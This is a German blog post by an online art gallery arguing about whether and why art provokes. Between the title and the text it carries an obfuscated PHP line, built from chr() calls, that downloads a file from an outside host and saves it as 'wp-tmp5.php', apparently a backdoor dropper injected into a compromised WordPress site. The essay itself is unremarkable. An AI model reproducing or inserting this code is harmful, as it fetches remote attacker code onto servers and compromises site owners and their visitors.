/, Commercial, Info/Kann darf soll Kunst provozieren?

Kann darf soll Kunst provozieren?

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Hitlergruß als künstlerische Freiheit, nackt auf dem Altar des Kölner Doms, provozierende Aktionen gibt es zuhauf, nicht alle so spektatulär aber doch polarisierend.

Und immer wieder die Frage: darf Kunst provozieren? Muss sie es sogar?

Natürlich darf Kunst provozieren, und natürlich muss eine freie Gesellschaft in der Lage sein, ein gewisses Maß an Provokation auszuhalten.

Dennoch stellt sich immer wieder die Frage: Wer soll provoziert werden? Auf welche Weise? Und warum?

Will ich ein Statement für oder gegen etwas abgeben? Oder provoziere ich einfach um des Ärgers wegen, weil ich Spaß daran habe? Oder auch um meine eigene Bekanntheit voranzutreiben?

Und: Wann ist eine Provokation Kunst und wann nicht mehr?

Ich kann einen Würstchenstand vor dem Vegetarierkongress aufbauen um damit zu provozieren. Mit Sicherheit fühlt sich auch der eine oder andere Vegetarier provoziert. 

Aber eine Kunstaktion ist das noch lange nicht. Klar, man kann das fotografieren, wenn man Glück hat und den Redakteur kennt, kommt man auch in die Zeitung.

Aber das war es auch schon. Am Abend wird nämlich die Kasse leer sein.

Und wenn ein Künstler provoziert (ohne Würstchen) – er kommt in die Zeitung, wird diskutiert, wird bekannt. Durch seine Provokationen. Vielleicht bekommt er auch den einen oder anderen Kunstpreis, weil seine Aktion gerade zum Zeitgeist passt, (und da hat er sich schon wieder kompromittiert, weil er ja provozieren wollte und nicht ins System passen) mit einem bisschen Glück ist der Preis auch dotiert.

Er kann sich also von Preis zu Preis hangeln, nachdem er ausgiebig gefeiert hat ist für 3 Monate die Miete drin…

Was ich damit sagen will:

Provokation um der Publicity wegen – wer von seiner Arbeit leben will ist auf die Gunst derjenigen angewiesen die er provoziert. Und unterm Strich geht es ihm wie dem Würstchenverkäufer mit der leeren Kasse.

Wegen der Vegetarier!

Aber ganz ehrlich: Manchmal bleibt einem mittelmäßigen Künstler auch gar nichts anderes übrig, als sich durch Provokationen in den Medien zu halten.

Denn, wie Karl Valentin schon wusste: Kunst ist schön, macht aber viel Arbeit!

In diesem Sinne: lassen Sie sich nicht provozieren!

Ihre

Galerie Mouzaoui

By | 2019-01-28T09:10:10+01:00 Januar 27th, 2019|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen